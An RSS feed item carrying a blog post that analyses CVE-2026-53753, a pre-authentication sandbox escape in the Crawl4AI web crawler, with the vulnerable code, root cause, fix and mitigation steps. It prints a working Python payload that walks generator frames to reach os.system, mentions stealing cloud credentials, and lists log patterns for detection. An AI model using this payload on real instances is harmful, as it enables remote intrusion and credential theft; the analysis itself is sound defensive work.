<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Crawl4ai on RockB</title><link>https://baeseokjae.github.io/tags/crawl4ai/</link><description>Recent content in Crawl4ai on RockB</description><image><title>RockB</title><url>https://baeseokjae.github.io/images/og-default.png</url><link>https://baeseokjae.github.io/images/og-default.png</link></image><generator>Hugo</generator><language>en-us</language><lastBuildDate>Thu, 25 Jun 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://baeseokjae.github.io/tags/crawl4ai/index.xml" rel="self" type="application/rss+xml"/><item><title>Crawl4AI Critical RCE Sandbox Escape 2026: CVE-2026-53753 (CVSS 9.8) — Pre-Auth RCE via AST Sandbox Escape</title><link>https://baeseokjae.github.io/posts/crawl4ai-rce-sandbox-escape-guide-2026/</link><pubDate>Thu, 25 Jun 2026 00:00:00 +0000</pubDate><guid>https://baeseokjae.github.io/posts/crawl4ai-rce-sandbox-escape-guide-2026/</guid><description>Complete technical guide to CVE-2026-53753 (CVSS 9.8): pre-auth RCE in Crawl4AI via AST sandbox escape using Python generator frame attributes. Root cau...</description><content:encoded><![CDATA[<p>Every Crawl4AI instance running version 0.8.6 or earlier with its default configuration is remotely exploitable with zero authentication. A single <code>POST /crawl</code> request carrying a crafted <code>JsonCssExtractionStrategy</code> schema is enough to escape the AST-based expression sandbox and execute arbitrary system commands inside the Docker container — no credentials, no prior access, no user interaction required. CVE-2026-53753 carries a CVSS 9.8 because the attack vector is network-based, the complexity is low, and the impact on confidentiality, integrity, and availability is total. The root cause is a three-line flaw in the <code>_safe_eval_expression()</code> function: an AST validator that only blocks attribute names starting with an underscore, missing Python internals like <code>gi_frame</code>, <code>f_back</code>, and <code>f_builtins</code> that expose the full interpreter to anyone who knows the class hierarchy.</p>
<h2 id="crawl4ais-computed-fields-feature">Crawl4AI&rsquo;s Computed Fields Feature</h2>
<p>Crawl4AI is an open-source, LLM-friendly web crawler and scraper — think Firecrawl but self-hosted in Docker. It lets you define extraction schemas that describe how to parse crawled pages. One feature, <strong>computed fields</strong>, allows users to specify Python expressions that transform extracted data inline. When you define a schema like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>schema <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#e6db74">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;MyExtractionStrategy&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#e6db74">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;json-css&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#e6db74">&#34;params&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;computed_fields&#34;</span>: {
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;total&#34;</span>: <span style="color:#e6db74">&#34;price * quantity&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Crawl4AI evaluates the <code>total</code> expression at extraction time using <code>_safe_eval_expression()</code> — a function that parses the expression into an AST, walks the tree, and rejects any node that accesses attributes starting with <code>_</code>. The intent was to prevent access to Python internals like <code>__class__</code>, <code>__subclasses__</code>, and <code>__builtins__</code>, which are the usual building blocks of Python jail escapes.</p>
<p>The approach worked against naive payloads. You couldn&rsquo;t write <code>().__class__.__base__.__subclasses__()</code> because <code>__class__</code> starts with an underscore. But the security model assumed that the only dangerous attributes in Python are the ones that start with <code>__</code>. That assumption was wrong.</p>
<h2 id="the-root-cause-blocking-underscores-is-not-enough">The Root Cause: Blocking Underscores Is Not Enough</h2>
<p>Here is the actual vulnerable function as it existed in Crawl4AI &lt;= 0.8.6:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e"># Vulnerable: Crawl4AI &lt;= 0.8.6</span>
</span></span><span style="display:flex;"><span>_SAFE_EVAL_BUILTINS <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;str&#34;</span>, <span style="color:#e6db74">&#34;int&#34;</span>, <span style="color:#e6db74">&#34;float&#34;</span>, <span style="color:#e6db74">&#34;bool&#34;</span>, <span style="color:#e6db74">&#34;len&#34;</span>, <span style="color:#e6db74">&#34;abs&#34;</span>,
</span></span><span style="display:flex;"><span>                       <span style="color:#e6db74">&#34;min&#34;</span>, <span style="color:#e6db74">&#34;max&#34;</span>, <span style="color:#e6db74">&#34;sum&#34;</span>, <span style="color:#e6db74">&#34;round&#34;</span>, <span style="color:#e6db74">&#34;range&#34;</span>, <span style="color:#e6db74">&#34;sorted&#34;</span>,
</span></span><span style="display:flex;"><span>                       <span style="color:#e6db74">&#34;reversed&#34;</span>, <span style="color:#e6db74">&#34;enumerate&#34;</span>, <span style="color:#e6db74">&#34;zip&#34;</span>, <span style="color:#e6db74">&#34;map&#34;</span>, <span style="color:#e6db74">&#34;filter&#34;</span>,
</span></span><span style="display:flex;"><span>                       <span style="color:#e6db74">&#34;type&#34;</span>, <span style="color:#e6db74">&#34;isinstance&#34;</span>, <span style="color:#e6db74">&#34;issubclass&#34;</span>, <span style="color:#e6db74">&#34;hasattr&#34;</span>,
</span></span><span style="display:flex;"><span>                       <span style="color:#e6db74">&#34;getattr&#34;</span>, <span style="color:#e6db74">&#34;setattr&#34;</span>, <span style="color:#e6db74">&#34;dict&#34;</span>, <span style="color:#e6db74">&#34;list&#34;</span>, <span style="color:#e6db74">&#34;tuple&#34;</span>,
</span></span><span style="display:flex;"><span>                       <span style="color:#e6db74">&#34;set&#34;</span>, <span style="color:#e6db74">&#34;frozenset&#34;</span>, <span style="color:#e6db74">&#34;True&#34;</span>, <span style="color:#e6db74">&#34;False&#34;</span>, <span style="color:#e6db74">&#34;None&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">_safe_eval_expression</span>(expression, context):
</span></span><span style="display:flex;"><span>    tree <span style="color:#f92672">=</span> ast<span style="color:#f92672">.</span>parse(expression, mode<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;eval&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> node <span style="color:#f92672">in</span> ast<span style="color:#f92672">.</span>walk(tree):
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> isinstance(node, ast<span style="color:#f92672">.</span>Attribute):
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># Block only underscore-prefixed attributes</span>
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">if</span> node<span style="color:#f92672">.</span>attr<span style="color:#f92672">.</span>startswith(<span style="color:#e6db74">&#34;_&#34;</span>):
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">ValueError</span>(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Access to attribute &#39;</span><span style="color:#e6db74">{</span>node<span style="color:#f92672">.</span>attr<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39; is not allowed&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> isinstance(node, ast<span style="color:#f92672">.</span>Call):
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">if</span> isinstance(node<span style="color:#f92672">.</span>func, ast<span style="color:#f92672">.</span>Name):
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">if</span> node<span style="color:#f92672">.</span>func<span style="color:#f92672">.</span>id <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> _SAFE_EVAL_BUILTINS:
</span></span><span style="display:flex;"><span>                    <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">ValueError</span>(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Call to &#39;</span><span style="color:#e6db74">{</span>node<span style="color:#f92672">.</span>func<span style="color:#f92672">.</span>id<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39; is not allowed&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    code <span style="color:#f92672">=</span> compile(tree, <span style="color:#e6db74">&#34;&lt;string&gt;&#34;</span>, <span style="color:#e6db74">&#34;eval&#34;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> eval(code, {<span style="color:#e6db74">&#34;__builtins__&#34;</span>: {}}, context)
</span></span></code></pre></div><p>The AST walker blocks <code>__class__</code>, <code>__subclasses__</code>, <code>__builtins__</code> — anything with a leading underscore. It then passes an empty <code>__builtins__</code> dict to <code>eval()</code> as a second layer of defense. Two layers, both relying on the same flawed assumption: that dangerous Python internals always have dunder names.</p>
<p>Python&rsquo;s generator and frame object attributes tell a different story:</p>
<table>
  <thead>
      <tr>
          <th>Attribute</th>
          <th>Object</th>
          <th>Starts with <code>_</code>?</th>
          <th>What It Exposes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td><code>gi_frame</code></td>
          <td>generator</td>
          <td>No</td>
          <td>Current execution frame of a suspended generator</td>
      </tr>
      <tr>
          <td><code>f_back</code></td>
          <td>frame</td>
          <td>No</td>
          <td>Previous frame in the call stack</td>
      </tr>
      <tr>
          <td><code>f_builtins</code></td>
          <td>frame</td>
          <td>No</td>
          <td>The real <code>__builtins__</code> dict of that frame</td>
      </tr>
  </tbody>
</table>
<p>None of these start with an underscore. They pass the AST validator without triggering any check. The <code>eval()</code> call sets <code>__builtins__</code> to <code>{}</code>, but the frame&rsquo;s <code>f_builtins</code> contains the original, unrestricted builtins from the caller&rsquo;s scope.</p>
<h2 id="the-exploit-chain-from-expression-to-shell">The Exploit Chain: From Expression to Shell</h2>
<p>The exploit requires sending a <code>POST /crawl</code> request with a <code>JsonCssExtractionStrategy</code> that includes a computed field containing a malicious expression. The expression uses a generator to access <code>gi_frame</code>, then walks the frame chain via <code>f_back</code> until it reaches a frame that still has the real <code>f_builtins</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e"># Simple generator to get a frame object</span>
</span></span><span style="display:flex;"><span>gen <span style="color:#f92672">=</span> (<span style="color:#66d9ef">lambda</span>: (<span style="color:#66d9ef">yield</span>))()
</span></span><span style="display:flex;"><span>frame <span style="color:#f92672">=</span> gen<span style="color:#f92672">.</span>gi_frame
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Walk up the call stack until we find the real __builtins__</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> frame:
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;os&#34;</span> <span style="color:#f92672">in</span> frame<span style="color:#f92672">.</span>f_builtins <span style="color:#f92672">or</span> <span style="color:#e6db74">&#34;__import__&#34;</span> <span style="color:#f92672">in</span> frame<span style="color:#f92672">.</span>f_builtins:
</span></span><span style="display:flex;"><span>        real_builtins <span style="color:#f92672">=</span> frame<span style="color:#f92672">.</span>f_builtins
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">break</span>
</span></span><span style="display:flex;"><span>    frame <span style="color:#f92672">=</span> frame<span style="color:#f92672">.</span>f_back
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Now we have the real __import__</span>
</span></span><span style="display:flex;"><span>__import__ <span style="color:#f92672">=</span> real_builtins[<span style="color:#e6db74">&#34;__import__&#34;</span>]
</span></span><span style="display:flex;"><span>os <span style="color:#f92672">=</span> __import__(<span style="color:#e6db74">&#34;os&#34;</span>)
</span></span><span style="display:flex;"><span>os<span style="color:#f92672">.</span>system(<span style="color:#e6db74">&#34;id&#34;</span>)
</span></span></code></pre></div><p>In practice, this can be compressed into a single expression that fits inside a computed field schema:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>(<span style="color:#66d9ef">lambda</span> g: g<span style="color:#f92672">.</span>gi_frame<span style="color:#f92672">.</span>f_back<span style="color:#f92672">.</span>f_back<span style="color:#f92672">.</span>f_back<span style="color:#f92672">.</span>f_builtins[<span style="color:#e6db74">&#34;__import__&#34;</span>](<span style="color:#e6db74">&#34;os&#34;</span>)<span style="color:#f92672">.</span>system(<span style="color:#e6db74">&#34;id&#34;</span>))((<span style="color:#66d9ef">lambda</span>: (<span style="color:#66d9ef">yield</span>))())
</span></span></code></pre></div><p>The exact number of <code>f_back</code> hops depends on the call depth at evaluation time, but the pattern is consistent: create a generator, grab <code>gi_frame</code>, walk <code>f_back</code> until you reach a frame whose <code>f_builtins</code> contains <code>__import__</code>, then import <code>os</code> and execute commands. From there, the attacker can exfiltrate environment variables, read <code>~/.aws/credentials</code> or the Docker API socket, modify files, or pivot to the host.</p>
<p>The full attack requires no authentication because Crawl4AI&rsquo;s JWT authentication is <strong>disabled by default</strong> in all versions prior to 0.8.7. If you deployed Crawl4AI following the default Docker setup and exposed port 11235, your instance has been remotely reachable and exploitable since day one.</p>
<p>I&rsquo;ve found that this vulnerability is particularly dangerous because Crawl4AI is often deployed by LLM application teams who want to give their agents web-browsing capability. These teams are not security engineers. They run <code>docker run -p 11235:11235 unclecode/crawl4ai:latest</code>, the web crawler works, they move on. The instance sits on a public cloud VM with a wide-open API endpoint serving Python <code>eval()</code> — essentially a remote shell with extra steps.</p>
<h3 id="hardcoded-jwt-secret-compounds-the-problem">Hardcoded JWT Secret Compounds the Problem</h3>
<p>Even if you did enable JWT authentication by setting <code>CRAWL4AI_API_TOKEN</code>, a separate vulnerability — CVE-2026-56265 (CVSS 9.3) — means the default signing key was hardcoded in the source code. An attacker who knows the default key can forge valid JWTs for any user and bypass authentication entirely. Together, these two CVEs mean that every Crawl4AI instance before 0.8.7 is completely compromised regardless of configuration: either auth is off (CVE-2026-53753 hits the wire directly) or auth is bypassable (CVE-2026-56265 unlocks the same endpoint).</p>
<h2 id="how-the-fix-works">How the Fix Works</h2>
<p>Crawl4AI 0.8.7 removes <code>eval()</code> from the computed fields expression path entirely. Here is what changed:</p>
<p><strong>Primary fix:</strong> The <code>_safe_eval_expression()</code> function and <code>_SAFE_EVAL_BUILTINS</code> are deleted. Computed field expressions that look like Python code now log a warning and return a default value instead of evaluating. Users who need post-processing must supply a Python callable as the <code>function</code> key in the schema — SDK-only, not available via the JSON API.</p>
<p><strong>Secondary hardening:</strong> The <code>hook_manager</code> sandbox — a separate code execution path for plugin hooks — was hardened to strip <code>__builtins__</code>, <code>__loader__</code>, and <code>__spec__</code> from injected modules. Dangerous builtins like <code>getattr</code>, <code>setattr</code>, <code>type</code>, and <code>__build_class__</code> were removed from the allowlist.</p>
<p><strong>Tertiary defense:</strong> The <code>/config/dump</code> endpoint (another <code>eval()</code> sink) was migrated to JSON input with Pydantic validation, eliminating a secondary injection vector.</p>
<p>The commit that deleted <code>_safe_eval_expression()</code> is straightforward — about 40 lines removed, none replaced with another eval-based approach. This is the right fix. AST sandboxing in Python has a long history of failures: every attempt to implement a &ldquo;safe eval&rdquo; by walking the AST tree has eventually been bypassed. The language&rsquo;s object model is too rich, the frame introspection API too powerful, and the gap between &ldquo;what the AST walker sees&rdquo; and &ldquo;what the interpreter does&rdquo; too wide. The only correct fix is to not evaluate untrusted expressions at all.</p>
<h2 id="mitigation-steps">Mitigation Steps</h2>
<p><strong>Immediate:</strong></p>
<ol>
<li>Upgrade to Crawl4AI 0.8.7 or later: <code>pip install crawl4ai&gt;=0.8.7</code></li>
<li>If using Docker, pull the latest image: <code>docker pull unclecode/crawl4ai:latest</code></li>
<li>If you cannot upgrade immediately, set <code>CRAWL4AI_API_TOKEN</code> to a strong random value <strong>and</strong> restrict network access to port 11235 via firewall rules — but note that CVE-2026-56265 means the token alone is not sufficient before 0.8.7.</li>
<li>Audit your Crawl4AI instances for signs of compromise: check access logs for computed field schemas containing <code>gi_frame</code>, <code>f_back</code>, or <code>f_builtins</code>. Run <code>docker logs &lt;container&gt;</code> and grep for <code>ValueError: Access to attribute</code> — legitimate usage rarely triggers that error.</li>
</ol>
<p><strong>Architectural:</strong></p>
<ul>
<li>Do not expose Crawl4AI&rsquo;s API port to the public internet. Place it behind an authenticating reverse proxy (nginx with basic auth, or a Cloudflare Access tunnel).</li>
<li>Run Crawl4AI in an isolated Docker container with minimal capabilities: <code>--cap-drop=ALL</code>, <code>--read-only</code>, no <code>docker.sock</code> mount.</li>
<li>Evaluate whether you need computed fields at all. For most crawling workflows, post-processing extracted data in your application code is safer and more maintainable than inlining Python expressions in JSON schemas.</li>
<li>Monitor for related CVEs: CVE-2026-53754 (SSRF filter bypass via IPv6 transition forms, CVSS 7.5) and CVE-2026-53755 (SSRF via proxy_config manipulation, CVSS 8.6) affect the same release range and indicate a pattern of incomplete input validation in Crawl4AI.</li>
</ul>
<p>For more on sandbox escape patterns in agent tooling, see the <a href="/posts/claude-code-network-sandbox-socks5-null-byte-bypass-guide-2026/">Claude Code SOCKS5 Null-Byte Bypass analysis</a>, which covers a similar parser-differential class in Anthropic&rsquo;s agent sandbox. The broader context of agent security boundaries is covered in the <a href="/posts/ai-agent-security-tools-2026/">AI Agent Security Tools Guide</a>.</p>
<h2 id="why-ast-sandboxes-keep-failing">Why AST Sandboxes Keep Failing</h2>
<p>This vulnerability is not Crawl4AI-specific — it is a recurring pattern in Python security. AST-based sandboxing has failed in Pandas (<code>pandas.eval</code>, CVE-2023-50447), smolagents (multiple sandbox escapes in <code>LocalPythonExecutor</code>), and countless CTF pyjail challenges. The fundamental problem is that Python&rsquo;s runtime does not distinguish between &ldquo;user code&rdquo; and &ldquo;system code&rdquo; at the object level. A frame&rsquo;s <code>f_builtins</code> is just a dict. A generator&rsquo;s <code>gi_frame</code> is just a pointer. There is no protection domain, no capability system, no membrane that controls what code can access what objects. The AST walker is a static analysis pass running against a dynamic language with first-class access to its own runtime — a mismatch that cannot be fixed with more blocklist entries.</p>
<p>Crawl4AI&rsquo;s maintainers made the correct call in 0.8.7: delete the eval path entirely, accept the feature loss, and tell users to use the SDK if they need computed fields. This is the only strategy that has proven durable in Python sandboxing.</p>
<h2 id="frequently-asked-questions">Frequently Asked Questions</h2>
<p><strong>Q: Does this vulnerability affect Crawl4AI instances with authentication enabled?</strong>
A: Yes. Even if you set <code>CRAWL4AI_API_TOKEN</code>, the default JWT signing key is hardcoded (CVE-2026-56265), enabling token forgery. The only fully mitigated configuration before 0.8.7 is one that is both authenticated and network-isolated — and even then, isolation is doing the heavy lifting.</p>
<p><strong>Q: Can I detect if my Crawl4AI instance has been compromised?</strong>
A: Check access logs for <code>POST /crawl</code> requests with unusually long or complex <code>computed_fields</code> entries. Look for generator syntax (<code>lambda: (yield)</code>), attribute chains (<code>gi_frame</code>, <code>f_back</code>), or string patterns resembling Python code. Also check for outbound connections from the container to unexpected destinations.</p>
<p><strong>Q: Is there a workaround for computed fields after upgrading to 0.8.7?</strong>
A: The <code>function</code> key in extraction schemas still works, but only through the Python SDK — it is not available via the JSON API. You must use the <code>Crawl4AI</code> SDK client and pass callables directly. The JSON API&rsquo;s computed field feature is permanently removed in 0.8.7.</p>
]]></content:encoded></item></channel></rss>